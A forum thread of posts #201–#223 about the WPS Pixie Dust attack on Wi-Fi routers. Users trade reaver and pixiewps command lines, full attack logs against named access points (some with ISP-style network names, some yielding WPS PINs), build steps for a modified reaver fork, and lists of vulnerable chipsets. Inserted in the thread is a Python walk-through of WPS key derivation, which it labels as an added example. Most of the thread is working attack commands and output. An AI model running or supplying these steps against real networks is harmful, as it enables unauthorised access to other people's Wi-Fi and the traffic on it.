
Thread: WPS Pixie Dust Attack (Offline WPS Attack)

  1. #201
    Join Date
    2015-Mar
    Posts
    127
    @MTeams

    Your internal reaver mod version feeds info into pixiewps automatically? (No more cut and paste?)

    If the pixie attack works > key........ if it fails, brute-force 11,000 pins?

    Will you release it when -pkr is added?
    Last edited by nuroo; 2015-04-12 at 14:33.

  2. #202
    Join Date
    2015-Apr
    Posts
    39
    Last edited by t6_x; 2015-05-16 at 11:59.

  3. #203
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by t6_x View Post
    Here is my contribution

    Reaver modified to make the pixiewps when testing a pin


    GitHub - Here

    https://github.com/t6x/reaver-wps-fork-t6x
    Thanks t6, just tested it.

    Code:
    reaver -i mon0 -b 40:70:09:DC:81:F0 -vv -S -K1
    Code:
    Reaver v1.5.1 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com>
    
    [+] Waiting for beacon from 40:**:**:**:BA:60
    [+] Switching mon0 to channel 1
    [+] Associated with 40:**:**:**:BA:60 (ESSID: TG1672G62)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f2:f4:15:6c:59:39:dc:06:18:e9:c9:4f:e0:f3:8a:ad
    [P] PKE: dc:1e:5a:f6:6c:b8:98:9f:de:77:66:4e:41:fb:e7:11:b7:02:b7:7c:59:52:11:81:19:32:f0:f7:51:4e:27:8e:57:9a:de:10:f7:b8:5b:1e:fd:aa:6e:06:9e:e1:f1:96:e5:5a:c7:6f:e8:41:f5:ae:4b:11:53:65:59:6f:48:11:07:4c:93:80:c3:bb:ee:9a:e8:af:50:f6:58:fd:97:52:37:30:e9:5b:8a:74:41:54:17:da:7e:ea:5a:8a:9e:bc:f7:40:7e:8d:65:29:f2:6b:21:ee:27:ae:c3:60:42:db:2c:75:2d:72:5e:33:79:7c:3a:5e:55:90:69:a9:2b:92:4d:2f:9a:14:13:1c:f0:f8:92:c6:77:04:eb:03:9c:e6:1f:7b:ea:8b:2b:5e:18:9f:99:49:38:e3:9a:4b:60:09:41:94:83:51:47:1d:b7:d5:1b:4c:51:7a:92:be:77:da:b5:eb:a3:86:7a:dc:84:b9:99:fe:02:2c:5c:44:36:a3
    [P] WPS Manufacturer: Celeno Communication, Inc.
    [P] WPS Model Number: CL1800
    [+] Received M1 message
    [P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:02
    [P] AuthKey: c3:ee:01:ef:f3:63:86:49:7e:24:13:54:d1:f0:0d:ff:57:77:12:65:38:34:6f:10:4a:c8:14:95:57:6c:0e:2f
    [+] Sending M2 message
    [P] E-Hash1: 41:73:b9:eb:ea:74:0f:b1:fd:1a:d1:93:0f:df:37:8e:d7:fe:6c:ee:c2:ec:0f:0d:60:ac:91:4d:04:60:03:ee
    [P] E-Hash2: f7:42:2b:e7:13:6f:d0:00:d8:05:72:7d:b6:71:29:c4:10:1f:2f:01:0b:38:b2:9e:7d:99:3f:a7:86:d5:93:85
    [Pixie-Dust]  
    [Pixie-Dust]   [*] ES-1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] ES-2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
    [Pixie-Dust]   [*] PSK1: d5:84:7c:94:bb:1c:3e:45:a5:3f:60:b4:a1:2b:a4:9b
    [Pixie-Dust]   [*] PSK2: 45:68:18:4b:9b:28:45:c9:2a:c8:78:c3:b8:a9:b6:92
    [Pixie-Dust]   [+] WPS pin: 60919014
    [Pixie-Dust]  
    [Pixie-Dust]   [*] Time taken: 0 s
    [Pixie-Dust]  
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received M3 message
    [+] Sending WSC NACK
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x03), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    +1 for adding pkr to reaver output
    Awesome!!
    Last edited by nuroo; 2015-04-12 at 15:45.

  4. #204
    Join Date
    2015-Mar
    Posts
    127
    In the example above reaver/pixie found the pin. Nice.
    But it kept going, continuing to try pins.

    Shouldn't it check the found pixie pin to get the passphrase and then end?

  5. #205
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Thanks to Wiire and Espresso_Boy, the new modified reaver now prints the PKr for Realtek devices! http://www.mediafire.com/download/or4jj8m8jfek5b4

  6. #206
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    In the example above reaver/pixie found the pin. Nice.
    But it kept going, continuing to try pins.

    Shouldn't it check the found pixie pin to get the passphrase and then end?
    Yes, it is possible.

    I'll make adjustments so that it does not continue with the test after running pixie.

    I will add an option to get the passphrase and close.

    Thanks for the tests and the contribution.

    I'll commit soon.

  7. #207
    Join Date
    2014-Feb
    Posts
    4
    root@kali:~# reaver -i mon0 -b 00:8E:F2:65:C4:74 -vv

    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [?] Restore previous session for 00:8E:F2:65:C4:74? [n/Y] n
    [+] Waiting for beacon from 00:8E:F2:65:C4:74
    [+] Switching mon0 to channel 12
    [+] Associated with 00:8E:F2:65:C4:74 (ESSID: virginmedia6972489)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 85:a2:64:d7:01:eb:1c:3f:9e:57:18:1e:8c:8d:cd:ec
    [P] PKE: 65:af:14:9c:e5:9b:2a:46:5f:a3:c4:e8:8e:ff:70:c4:35:10:ab:8f:a0:ef:a5:53:d8:14:ee:87:e7:ea:20:b4:27:f5:9d:b3:77:0f:c0:0b:3d:82:d7:c6:2d:65:84:62:bb:de:dc:9a:9e:f5:a2:6a:8d:94:f4:d2:28:6c:64:80:9c:b3:06:fe:b5:4f:a0:8b:8d:12:54:97:16:0c:98:87:b4:52:0f:b4:53:39:b8:72:f8:08:cd:9f:1e:4e:b9:d4:c5:7b:77:69:84:17:e8:72:81:9c:b0:a7:af:86:92:6c:2f:38:03:7e:d9:2a:16:31:51:b3:22:22:ed:6b:4c:76:f7:cf:a5:4e:68:97:5c:fc:16:2a:a7:13:0e:0d:c2:93:31:3f:08:a3:51:cb:5c:68:b4:08:b5:90:89:c7:3c:a8:ef:20:dc:4d:b5:54:dc:03:d0:a2:80:ad:35:57:7a:e4:50:1c:a8:6a:eb:f2:d9:88:a0:7c:b3:a7:a8:8f:c7:26
    [P] WPS Manufacturer: Netgear
    [P] WPS Model Number: 123456
    [+] Received M1 message
    [P] PKR: b8:d9:19:ba:d9:af:20:61:11:4c:7b:6b:03:97:ce:fc:59:bd:c5:f0:e0:d9:c8:ab:13:10:8e:ef:11:ff:b9:91:2a:6a:7e:d9:61:6b:61:04:5b:56:ed:8e:d3:38:3a:94:bf:57:5c:1b:2c:d0:1a:39:ec:53:26:43:62:8d:fc:62:bb:64:0b:b6:ed:4d:96:8d:8d:67:b9:a2:68:21:a5:de:6d:e1:65:2d:7b:bd:25:95:26:f0:2d:ef:2d:9b:30:57:59:e0:5f:b9:b8:92:7a:03:16:84:3a:c0:cd:ee:56:d9:6f:ba:48:65:7d:9b:cf:72:d0:24:1a:96:c5:db:29:67:cc:4c:d2:58:0c:f5:75:5c:04:d8:a0:25:05:5e:7a:c9:e9:0f:aa:7f:fc:cf:42:58:d7:d0:5b:ba:d0:84:c1:f4:62:53:af:02:57:54:8c:f4:7f:26:4b:ca:b2:01:a9:16:f5:7b:38:53:76:c8:a9:9a:04:6f:be:05:40:87:ac:3e
    [P] AuthKey: de:7d:cd:3d:d7:1c:90:ef:7c:bb:f8:01:90:6e:14:08:4a:77:4b:33:88:7b:41:05:85:a7:46:74:14:72:00:ae
    [+] Sending M2 message
    [P] E-Hash1: db:b9:20:c2:cf:a1:53:55:f2:d0:1a:79:ce:4c:f5:ba:7c:4f:dd:4d:f4:b3:35:ef:86:a3:93:47:00:c1:05:0b
    [P] E-Hash2: 97:f5:e9:a1:4e:cd:bf:8f:76:dd:8c:87:1a:30:24:76:8e:0c:56:c1:11:4e:77:89:33:45:c9:f6:66:b9:05:dc


    Working well; now to see if it will find the pin. Other attempts before said no.

  8. #208
    Join Date
    2014-Feb
    Posts
    4
    [+] Switching mon0 to channel 11
    [+] Waiting for beacon from 7C:4C:A53:84:45
    [+] Associated with 7C:4C:A53:84:45 (ESSID: SKYA2FF7)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 04:57:06:96:9a:79:ba:40:c4:98:bb:bd:8f:44:82:84
    [P] PKE: 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6:3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9:40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3:25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:85:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29:81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75:51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:98:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18:b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b:f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:88:03:a5:a7:a1:0f:a9:6f:37
    [P] WPS Manufacturer: Broadcom
    [P] WPS Model Number: 123456
    [+] Received M1 message
    [P] PKR: f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9:e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:48:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e:ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46:d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:72:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e:b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d:85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d:bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be:c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9e:59:92:16:a4:06:d1:c0:cb
    [P] AuthKey: 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa:ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef
    [+] Sending M2 message
    [P] E-Hash1: 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32:c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f
    [P] E-Hash2: b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81:d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a


    root@kali:~# pixiewps -e 3a:71:75:33:23:ec:a9:c6:bc:36:9c:c6:f0:4c:33:e0:f6:3f:6b:86:ad:b1:48:31:32:00:82:eb:c7:0b:9d:6d:ca:2f:4d:66:55:7e:4a:df:75:cb:28:1a:61:ca:91:a5:41:b9:40:e5:fa:2d:a4:f2:01:26:2a:f4:ad:06:8f:dd:69:61:b3:25:8d:a4:7b:e7:8c:76:a6:6f:7a:cb:61:f3:f7:17:6e:85:30:d8:33:f0:66:74:09:a7:7e:8c:22:9f:21:d2:bb:29:81:1f:55:fe:a4:7e:6e:c8:57:49:0a:a8:d9:9a:7e:7c:75:51:a4:88:04:fe:20:75:e8:71:e9:54:cb:e1:93:d5:bd:98:f4:49:09:91:76:35:dc:39:ae:54:d6:09:47:01:d2:18:b6:27:9c:3e:60:2e:b6:d9:79:18:9d:b2:5a:da:8b:51:6b:f8:85:19:b9:e3:98:dc:c0:17:e5:b0:36:e2:60:b0:a7:88:03:a5:a7:a1:0f:a9:6f:37 -r f9:78:e8:ce:de:80:d6:14:c0:31:c1:10:e1:e6:a7:ae:f9:e7:b6:29:d8:9c:90:07:e9:f2:66:c1:db:65:03:51:76:48:f4:35:f1:81:af:1e:62:2a:2d:7b:63:88:58:71:dd:4e:ca:f7:2d:cd:13:94:f8:47:8f:93:4f:db:09:40:1b:8e:46:d0:ee:a0:1e:d5:73:f3:ff:f0:44:32:27:79:58:96:cf:72:88:30:0c:f2:47:47:b8:ba:f9:a9:0a:b7:a0:e0:db:8e:b4:ae:cb:06:65:c6:6d:d3:fe:78:b5:89:44:5a:cf:71:1d:85:d1:78:49:37:c2:d2:ed:81:17:44:ba:a9:08:03:c9:d0:4c:e9:fe:3c:66:c3:7d:5d:d4:e2:50:d2:f3:d5:44:1d:bd:30:12:21:65:9b:27:e7:16:4e:f4:b4:75:1b:12:4f:be:c7:6c:bc:7e:01:29:41:36:1a:a5:76:56:49:a0:fd:9b:9e:59:92:16:a4:06:d1:c0:cb -s 06:2d:bb:18:21:ad:97:a3:20:f9:58:93:fc:8c:e8:df:32:c3:9f:79:70:e9:9b:61:ef:de:0c:e1:d5:cd:83:6f -z b7:0b:28:2f:47:d7:35:76:3f:e4:c7:2f:b0:75:1d:d1:81:d9:72:56:00:3a:80:49:ae:54:78:25:fb:f5:93:7a -a 9b:91:20:f7:d1:18:75:42:cc:3b:50:6c:70:f7:da:6f:fa:ad:c8:3b:e5:b0:2d:e1:a3:3d:e8:8e:bd:af:44:ef

    [-] WPS pin not found!
    [*] Time taken: 0 s

  9. #209
    Join Date
    2015-Mar
    Posts
    127
    @soxrok2212

    Reaver reports:
    Manufacturer: MTT
    Model Number: 123456

    Wireshark reports:
    Manufacturer: MTT
    Model Name: MWG3401N

    Brand name possibly Zoom? Can't find any info on the chipset used.

    Pixiewps attack fails; however, the 1st try pin '12345670' gives the passphrase!! Wow
    Last edited by nuroo; 2015-04-12 at 17:43.

  10. #210
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Probably a really old AP that the manufacturer never fixed.

  11. #211
    Join Date
    2015-Apr
    Posts
    15


    Vulnerable:

    WPS Manufacturer: D-Link
    WPS Model Number: DIR-615H1
    Chip: Ralink RT3352

    E-Nonce: 60:d5:32:46:7f:2c:31:a8:e6:0b:db:5a:5e:06:ce:f8
    PKE: ac:21:5b:eb:8d:70:ac:53:81:c7:4d:aa:fc:88:90:3d:8f:c7:5d:e8:fa:b1:d3:0f:d6:81:bf:d7:a1:0d:23:62:d3:07:77:d6:76:7b:5c:cc:18:f2:13:f3:1f:d2:64:86:87:67:74:cf:38:db:e4:32:86:92:65:05:9a:8d:a3:eb:79:27:60:e6:13:74:d2:3b:92:42:37:e3:bb:3d:29:db:ff:78:49:27:18:10:ef:bd:a4:ce:57:40:aa:7e:2d:bf:21:51:9f:91:f0:df:e3:d2:89:b5:9f:c1:b6:1c:5c:1e:d9:e3:73:d4:38:3b:75:2e:e1:c2:63:55:a3:4d:e9:fe:c3:1f:e4:4d:ac:69:fe:9c:d3:37:7a:df:36:89:a3:61:00:92:d2:94:2e:b2:fd:82:84:b8:08:d3:64:ea:28:cd:26:5e:d6:62:a0:8e:e5:df:f6:5f:2c:0d:28:c8:b6:48:c7:91:d2:e5:b7:d6:bd:c1:f4:7a:e6:be:e1:37:0b:96
    AuthKey: 93:94:ad:9a:fd:e1:e4:bc:6e:9b:77:ec:a8:52:de:cb:33:3f:11:6d:d8:66:b2:d3:01:25:27:b9:9c:1f:91:ed
    E-Hash1: 86:31:65:59:bc:4c:4f:6c:55:53:6c:bd:24:82:11:4c:35:4b:16:ed:b4:f9:b5:d5:b7:6a:d0:7f:be:bd:68:b8
    E-Hash2: 4b:f6:32:c3:55:2e:0b:e4:41:68:7b:03:10:74:2b:59:44:6a:ee:27:d2:93:ca:d0:1a:cb:a1:da:2a:95:c6:9d

    NOT VULNERABLE:

    Model: WNR1000v3 - Netgear
    Chip: Broadcom BCM5356A1


    E-Nonce: 5a:bc:44:d6:c7:96:9f:12:4e:e2:0a:c3:b6:b2:cd:53
    PKE: e5:4d:f8:60:b2:0c:a4:1e:94:55:46:bf:b5:e6:ba:72:0b:52:b5:37:ef:d9:e3:cd:a9:cd:e6:16:c6:b6:d9:d4:41:47:05:59:aa:3c:b9:e0:2d:89:4b:d1:bd:97:a1:23:a4:b7:98:48:2b:6e:dd:a1:b2:0c:28:d1:2c:a5:1c:6a:c7:26:e2:4d:18:f0:28:2d:1b:35:85:a0:01:1d:2f:1c:09:f6:b0:03:ee:c6:86:ff:dd:8d:84:f1:22:1d:de:2a:ff:9e:b3:70:95:09:75:85:4a:1a:8a:41:57:7b:8e:e2:60:79:4f:91:cc:a2:55:12:73:a5:6c:e3:c5:08:fc:81:9a:1f:18:48:25:69:f6:d6:6e:d2:1b:c3:d2:7b:87:c1:ee:ab:e6:e3:48:eb:ed:8c:4f:1a:d1:60:27:b7:88:ed:96:5c:47:5f:b5:a4:d3:78:0b:20:f7:5b:1e:cf:c0:a0:03:e4:49:f1:57:df:f9:b9:42:85:a0:51:dd:bc:cf:bd
    PKR: d8:8d:2f:fe:ca:6a:e6:db:c8:ac:7d:9c:5c:f8:36:6b:7c:40:d2:56:91:0c:5d:d8:e4:f1:a8:2b:7f:c1:10:98:bf:a2:e3:df:02:a3:86:bb:be:10:a7:00:62:43:41:74:db:15:40:b5:18:42:de:92:e3:15:02:40:63:f2:fa:43:3d:ed:8c:78:e5:bf:40:37:1f:72:78:3a:73:c8:1f:93:9c:13:18:a4:22:a6:8f:66:7d:c2:43:12:94:6f:92:a4:42:19:b2:0d:21:b4:23:7b:75:75:f2:99:13:d4:09:76:fb:a7:23:93:1b:82:93:91:f6:cf:92:af:15:36:3c:a5:c4:5e:65:95:10:52:54:dc:74:7b:b9:74:2d:fa:9e:6f:fb:c9:e6:87:a7:ee:47:31:dc:ae:93:ba:6d:15:13:c9:51:7f:de:8f:f7:c7:c3:09:86:3d:6b:cd:5e:3a:7d:a7:af:fb:39:82:10:12:0c:1c:23:f7:16:6b:fe:6c:86:fc
    AuthKey: 5a:bf:8b:43:be:0d:e2:12:0d:48:a5:a4:95:7a:e5:31:1d:6a:75:0e:49:7e:6e:fd:18:07:96:c3:7d:21:f8:1e
    E-Hash1: 2a:1f:0d:4e:de:29:61:01:a0:86:45:be:34:71:ae:15:3c:58:21:e1:34:77:9b:f7:89:ed:48:07:b8:ee:9e:ac
    E-Hash2: 44:31:63:0f:9c:5e:e7:5b:bb:a7:1b:c2:b7:14:35:93:16:fe:e7:0e:0e:33:85:c3:08:9f:24:a6:8c:dd:68:c7

    btw @soxrok2212: I forgot two digits in the Hitron number. Correct is cve30360, not cve360.
    @all:
    Is there any way to calculate the auth-key from an existing .pcap with some bash/shell code? I'd like to extract the necessary info with tshark from the capture file (for PKR: tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with a bash script.
    Thanks & I forgot at my first post: great work!

  12. #212
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by nuroo View Post
    In the example above reaver/pixie found the pin. Nice.
    But it kept going, continuing to try pins.

    Shouldn't it check the found pixie pin to get the passphrase and then end?
    I committed a new version on GitHub, but I could not get into the forum to post.

    Whenever you need to make modifications and further improvements, just stay tuned on GitHub.

    This week I will post a new tool.

    Apparently someone was attacking my account to stop me from logging in to this forum. I do not know the reason for this; I tried to create another account, but it also began to be attacked.

    I told the admin and they are already looking for the user responsible for this (someone behind this proxy (167.114.0.xxx)).
    Last edited by t6_x; 2015-04-13 at 04:25.

  13. #213
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by t6_x View Post
    I committed a new version on GitHub, but I could not get into the forum to post.

    Whenever you need to make modifications and further improvements, just stay tuned on GitHub.

    This week I will post a new tool.

    Apparently someone was attacking my account to stop me from logging in to this forum. I do not know the reason for this; I tried to create another account, but it also began to be attacked.

    I told the admin and they are already looking for the user responsible for this (someone behind this proxy (167.114.0.xxx)).
    wow t6, someone is a hater. Sorry to hear you were being blocked. Wish I saw this post last night; I'm anxious to try the new version of reaver, but it's time for work. I will try it at lunch time and report back. Excellent work!

  14. #214
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Quote Originally Posted by someone_else View Post
    @all:
    Is there any way to calculate the auth-key from an existing .pcap with some bash/shell code? I'd like to extract the necessary info with tshark from the capture file (for PKR: tshark -r "$capfile" -Y "wps.message_type == M2" -T fields -e wps.public_key |head -1 ) and calculate the auth-key with a bash script.
    Thanks & I forgot at my first post: great work!
    Yeah, it's pretty simple but we haven't done it yet :P The drawback is you need to use small DH keys in reaver to do it manually... and small DH keys don't work for Realtek :P Anyways, all you have to do is make the KDK, or Key Derivation Key:
    Code:
    KDK = HMAC-SHA-256_DHKey (N1 || EnrolleeMAC || N2)
    And then this gives you the AuthKey, KeyWrapKey and the EMSK:
    Code:
    kdf(key, personalization_string, total_key_bits):
        result := ""
        iterations = (total_key_bits + prf_digest_size - 1) / prf_digest_size
        for i = 1 to iterations do
            result := result || prf(key, i || personalization_string || total_key_bits)
        return 1st total_key_bits of result and destroy any bits left over
    I'm not a coder so I can't do it but I'm sure someone else can.
    Last edited by soxrok2212; 2015-04-13 at 22:33.
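    The derivation soxrok2212 quotes above, carried through in Python as an added example (it is not code from reaver, pixiewps, or any poster in this thread). The parts the post leaves implicit are filled in from the WPS specification: prf is HMAC-SHA-256, the counter i and total_key_bits are 32-bit big-endian integers, the personalization string is "Wi-Fi Easy and Secure Key Derivation", DHKey is SHA-256 of the Diffie-Hellman shared secret, and the 640 bits of kdf output split into AuthKey (256) || KeyWrapKey (128) || EMSK (256). All input values in example() are constructed, not taken from any capture.

```python
import hashlib
import hmac
import struct

# Fixed by the Wi-Fi Simple Configuration spec: the kdf's personalization_string.
WPS_KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"
PRF_DIGEST_BITS = 256  # prf is HMAC-SHA-256


def wps_kdf(key: bytes, personalization: bytes, total_key_bits: int) -> bytes:
    """kdf(key, personalization_string, total_key_bits) as quoted in the post above.

    The counter i and total_key_bits are encoded as 32-bit big-endian integers;
    only the first total_key_bits of the concatenated prf outputs are returned.
    """
    iterations = (total_key_bits + PRF_DIGEST_BITS - 1) // PRF_DIGEST_BITS
    result = b""
    for i in range(1, iterations + 1):
        msg = struct.pack(">I", i) + personalization + struct.pack(">I", total_key_bits)
        result += hmac.new(key, msg, hashlib.sha256).digest()
    return result[: total_key_bits // 8]   # "destroy any bits left over"


def dh_key_from_shared_secret(shared_secret: bytes) -> bytes:
    """DHKey = SHA-256 of the 1536-bit Diffie-Hellman shared secret g^(AB) mod p."""
    return hashlib.sha256(shared_secret).digest()


def derive_wps_keys(dh_key: bytes, n1: bytes, enrollee_mac: bytes, n2: bytes):
    """KDK = HMAC-SHA-256_DHKey(N1 || EnrolleeMAC || N2); then 640 bits of kdf
    output split as AuthKey (256) || KeyWrapKey (128) || EMSK (256).

    N1 is the Enrollee nonce (E-Nonce, sent in M1), N2 the Registrar nonce
    (sent in M2), EnrolleeMAC the 6-byte MAC of the enrollee (the AP here).
    """
    kdk = hmac.new(dh_key, n1 + enrollee_mac + n2, hashlib.sha256).digest()
    keys = wps_kdf(kdk, WPS_KDF_LABEL, 640)
    return keys[:32], keys[32:48], keys[48:80]


def colon_hex(data: bytes) -> str:
    """Render bytes the way reaver prints them: 'aa:bb:cc:...'."""
    return ":".join("%02x" % b for b in data)


def example() -> dict:
    """Run the derivation on constructed inputs (not taken from any real capture)."""
    shared_secret = bytes((i * 7 + 3) % 256 for i in range(192))  # stand-in for g^(AB) mod p
    e_nonce = bytes.fromhex("00112233445566778899aabbccddeeff")     # constructed N1
    r_nonce = bytes.fromhex("ffeeddccbbaa99887766554433221100")     # constructed N2
    enrollee_mac = bytes.fromhex("020000000001")                    # constructed, locally administered
    auth_key, key_wrap_key, emsk = derive_wps_keys(
        dh_key_from_shared_secret(shared_secret), e_nonce, enrollee_mac, r_nonce)
    return {"AuthKey": colon_hex(auth_key),
            "KeyWrapKey": colon_hex(key_wrap_key),
            "EMSK": colon_hex(emsk)}


if __name__ == "__main__":
    for name, value in example().items():
        print("[P] %s: %s" % (name, value))
```

    The "small DH keys" caveat in the post is what makes this computable from a capture at all: with reaver's -S option the registrar's private key is 1, so PKR is the value 2 (the all-zeros PKR ending in :02 in post #203 above) and the shared secret is simply the PKE bytes, giving DHKey = SHA-256(PKE). With a normally generated registrar key the shared secret never appears on the air, and a capture alone does not let a third party recompute AuthKey.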

  15. #215
    Join Date
    2015-Mar
    Posts
    127
    Belkin International
    F9K1002

    wikidevi: 5 versions, different chipsets.

    pixiewps attack failed though; didn't catch the version number with Wireshark however.

  16. #216
    Join Date
    2015-Apr
    Posts
    1
    Hi. Thanks for this great information. Keep it up :-). I tried to do it with pixiewps master but I didn't find the PKr key, and I added -S but it didn't work. So I tried Pixiescript v2.1 and I got this: thanks
    REAVER TRABAJANDO CON BSSID 18:17:25:2B:E3:50, ESSID TNCAP2BE350 ESPERA 50 s ...
    EXTRAYENDO DATOS ...
    PKr : 00814f6ea4c9ab9d5d80106f6b8e314768ae728b4214c4698a02eb9320f41e53f1054e6e137f64b64fec379fed2ce57c04af39e51ff450908c74df7e6d7df0ec1430dca9841ec83b2e318c78d8835a8b03c6321af1a168cd2a6383fa6458cce341a45e85fbad444291e255d1c3204c12df3c8373061b6183f55c8ff458f68f433334c1c0424fd95756efff233d8087a1d92aa64e92bb3470ac1625c5308dc1af5839e58a42f35336e3f74a4b18806cf6cc6f054a9700fee1d8a507ce413dc07a
    PKe : d0141b15656e96b85fcead2e8e76330d2b1ac1576bb026e7a328c0e1baf8cf91664371174c08ee12ec92b0519c54879f21255be5a8770e1fa1880470ef423c90e34d7847a6fcb4924563d1af1db0c481ead9852c519bf1dd429c163951cf69181b132aea2a3684caf35bc54aca1b20c88bb3b7339ff7d56e09139d77f0ac58079097938251dbbe75e86715cc6b7c0ca945fa8dd8d661beb73b414032798dadee32b5dd61bf105f18d89217760b75c5d966a5a490472ceba9e3b4224f3d89fb2b
    EHASH1 : 316321fbd0c01cd758a89284fdc4c40bcbbe8f4be95a9d8f2b22c6504a8d4e70
    EHASH2 : c680832b3a6e8afc47ef64147757cfb5d66ad977ea4cfc1dd6d004563e1f2629
    AuthKey: 89299deee5f7a96ff56751a1628d9b9fdcad677af68ceb015d5249bd7aac13ad
    Enrollee Nonce: 6e6e281312d0aa2679a8909435fd7d6f

    DATOS AP
    ========
    BSSID: : 18:17:25:2B:E3:50
    ESSID: : TNCAP2BE350
    Fabricante : Technicolor
    Nombre del dispositivo : Router
    Version OS : 268435456
    Modelo : Technicolor TD5
    Numero de modelo : Technicolor TD5

    PROBANDO CON PIXIEWPS 1.0 by wiire

    [-] WPS pin not found!
    [*] Time taken: 1 s

  17. #217
    Join Date
    2014-Nov
    Posts
    7
    Quote Originally Posted by simo1 View Post
    I tried the Pixiescript v2.1 and ...
    Pixiescript v2.4 is out.

  18. #218
    Join Date
    2015-Mar
    Posts
    19
    If you have the wps pin already through another method
    how can you find out the pass-phrase ?

  19. #219
    Join Date
    2014-Oct
    Posts
    2
    Really interested, but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
    It needs reaver; what must I do to install it?
    Thank you

  20. #220
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by saturn95 View Post
    Really interested, but I am a noob and doing a lot of reading. I am running reaver-wps-fork-read-only and have been trying to change over to reaver-wps-fork-t6x.
    It needs reaver; what must I do to install it?
    Thank you
    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install <<<----- will remove old version

  21. #221
    Join Date
    2014-Oct
    Posts
    2
    Quote Originally Posted by nuroo View Post
    Build Reaver

    cd reaver-wps-fork-t6x-master
    cd src
    ./configure
    make

    Install Reaver

    sudo make install <<<----- will remove old version
    Thank you for responding

    I am now trying to figure how to use Wireshark to find M1 and M2 data.

    Thank you

  22. #222
    Join Date
    2015-Apr
    Posts
    28
    Great!

    Vulnerable: Ralink chipsets...
    Invulnerable: Realtek chipsets.

    Example... RTL8671 EV 2006-27-07 Realtek chipsets are invulnerable...


    Some modems use the modem serial number as the WPS pin..

    Example . Air -rities modems...

  23. #223
    Join Date
    2015-Mar
    Posts
